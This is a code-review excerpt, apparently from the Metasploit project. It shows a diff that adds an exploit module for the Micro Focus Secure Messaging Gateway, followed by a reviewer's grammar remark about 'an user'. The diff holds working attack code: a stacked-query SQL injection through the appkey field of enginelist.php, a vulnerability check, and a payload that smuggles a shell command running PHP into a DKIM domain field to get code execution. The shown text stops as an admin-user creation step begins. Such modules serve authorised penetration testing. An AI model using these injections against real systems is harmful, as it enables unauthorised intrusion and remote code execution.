modules/exploits/linux/http/microfocus_secure_messaging_gateway.rb

```diff
@@ -0,0 +1,217 @@
+        OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/'])
+      ]
+    )
+  end
+
+  def execute_query(query)
+    #
+    # We have a very rare SQLi case in here. Normally, it's would be very easy to exploit it by using time-based techniques
+    # but since we are able to use stacked-query approach, following form of payload is required in order to be able
+    # get back the output of query !
+    #
+    r = rand_text_alphanumeric(3 + rand(3))
+    sql = r
+    sql << "') LEFT JOIN ScanEngineProperty AS ScanEngineBindAddressPlain ON ScanEngineBindAddressPlain.idScanEngine=ScanEngineProperty.idScanEngine "
+    sql << "LEFT JOIN ScanEngineProperty AS ScanEngineBindAddressSsl ON ScanEngineBindAddressSsl.idScanEngine=ScanEngineProperty.idScanEngine "
+    sql << "LEFT JOIN ScanEngineProperty AS ScanEngineEnableSsl ON ScanEngineEnableSsl.idScanEngine=ScanEngineProperty.idScanEngine; "
+    sql << query
+    sql << "; -- "
+    sql << r
+
+    send_request_cgi(
+      'method'  => 'POST',
+      'uri'     =>  normalize_uri(target_uri.path, 'api', '1', 'enginelist.php'),
+      'vars_post' => {
+        'appkey' => r
+      }
+    )
+
+  end
+
+  def something_went_wrong
+    fail_with Failure::Unknown, 'Something went wrong'
+  end
+
+  def check
+    r = rand_text_numeric(15..35)
+    res = execute_query("SELECT #{r}")
+    unless res
+      vprint_error 'Connection failed'
+      return CheckCode::Unknown
+    end
+    unless res.code == 200 && res.body.include?(r)
+      return CheckCode::Safe
+    end
+    CheckCode::Vulnerable
+  end
+
+  def implant_payload(cookie)
+    print_status('Creating a domain record with a malformed DKIM data')
+    p = [
+      {
+        :id => 'temp_0',
+        :Description => rand_text_alpha(5),
+        :DkimList => [
+          {
+            :Domain => "$(php -r '#{payload.encoded}')",
+            :Selector => '',
+            :TempId => 'tempDkim_1'
+          }
+        ]
+      }
+    ].to_json
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'admin', 'contents', 'ou', 'manage_domains_save_data.json.php'),
+      'cookie' => cookie,
+      'vars_get' => {
+        'cache' => 0,
+      },
+      'vars_post' => {
+        'StateData' => '[{"ouid":1}]',
+        'SaveData' => p
+      }
+    })
+
+    if res && res.code == 200 && res.body.include?('DbNodeId')
+      # Defining as global variable since we need to access them later within clean up function.
+      @domainid  = JSON.parse(res.body)['Nodes'][0]['DbNodeId']
+      @dkimid  = JSON.parse(res.body)['Nodes'][1]['DbNodeId']
+      print_good('Payload is successfully implanted')
+    else
+      something_went_wrong
+    end
+  end
+
+  def create_user
+    # We need to create an user by exploiting SQLi flaws so we can reach out to cmd injection
+    # issue location where requires a valid session !
+    print_status('Creating an user with appropriate privileges')
```

Comment:
`Creating a user`

[English is silly](https://www.quora.com/Which-is-right-Creating-a-user-guide-or-creating-an-user-guide)